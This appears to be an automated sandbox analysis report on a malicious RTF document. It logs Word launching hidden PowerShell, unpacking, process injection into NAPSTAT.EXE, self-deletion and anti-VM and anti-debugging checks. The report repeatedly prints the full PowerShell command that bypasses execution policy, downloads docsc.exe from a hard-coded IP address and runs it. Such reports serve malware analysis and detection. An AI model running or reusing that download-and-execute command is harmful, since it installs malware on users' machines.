          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j.....&}...............p.............}..v....x.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....0.................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.^.....w..................j.....&}...............p.............}..v............0.......................f.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......................p.............}..v.... .......0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....&}...............p.............}..v............0................"}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....h.................p.............}..v............0...............X#}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.^.....................@/.j......}...............p.............}..v.....N......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j....pO................p.............}..v.....O......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v.....V......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j....8W................p.............}..v.....W......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.4.............}..v.....[......0...............H.}.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....\................p.............}..v.....]......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v.....c......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....d................p.............}..v.....e......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v.....k......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....l................p.............}..v.....m......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........H.}.....H.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....r................p.............}..v....0s......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v.....y......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j.....z................p.............}..v....0{......0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....H.......0...............H.}.....&.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j......................p.............}..v............0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................@/.j......}...............p.............}..v....H.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j......................p.............}..v............0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............H.}.....<.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j....x.................p.............}..v............0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......@/.j......}...............p.............}..v............0...............H.}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..j....@.................p.............}..v............0.................}.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
          Source: C:\Users\user\AppData\Roaming\docsc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: 1c60a1e9_by_Libranalysis.rtf ReversingLabs: Detection: 31%
          Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: mscorlib.pdbment.Automation.pdb" source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: docsc.exe, NAPSTAT.EXE
          Source: Binary string: mscorlib.pdbment.Automation.pdbBBo source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2099945495.0000000002B66000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.pdba source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2104233288.0000000002730000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2109112416.000000001B490000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2111059281.000000001B510000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Unpacked PE file: 10.2.docsc.exe.bd0000.3.unpack U#j;F_`:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
          Suspicious powershell command line found
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: docsc[1].exe.0.dr | Static PE information: section name: U#j;F_`
          Source: docsc[1].exe.0.dr | Static PE information: section name:
          Source: docsc.exe.3.dr | Static PE information: section name: U#j;F_`
          Source: docsc.exe.3.dr | Static PE information: section name:
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 10_2_004392EF push ss; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 10_2_00438F95 push edi; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8B5C2 push cs; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C88FD4 push ds; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8ADE3 pushad ; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8B5F8 push cs; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8B9FA push ss; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C88485 push ds; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8BB44 push ds; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8B346 push cs; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8BB56 push ds; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8AE02 pushad ; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C88118 push FFFFFF8Fh; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8B610 push cs; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 11_2_00C8BB32 push ds; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_004161E7 push edi; retf
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_004151B4 pushfd ; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0041B3B5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0041B46C push eax; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0041B402 push eax; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0041B40B push eax; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0041543B pushfd ; iretd
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_00415485 push edx; ret
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_0073DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_020ADFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_000951B4 pushfd ; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_000961E7 push edi; retf
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_0009B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_0009B40B push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_0009B402 push eax; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 14_2_0009543B pushfd ; iretd
          Source: initial sample | Static PE information: section name: U#j;F_` entropy: 7.99977911602

          Persistence and Installation Behavior:

          Tries to download and execute files (via powershell)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\docsc.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\docsc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 0000000A.00000002.2116660543.000000000238C000.00000004.00000001.sdmp, type: MEMORY
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\docsc.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\docsc.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 12_2_004088B0 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2948 | Thread sleep time: -104068s >= -30000s
          Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2884 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\docsc.exe TID: 2236 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2796 | Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2560 | Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Thread delayed: delay time: 104068
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

          Anti Debugging:

          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Code function: 10_2_001D1660 CheckRemoteDebuggerPresent,
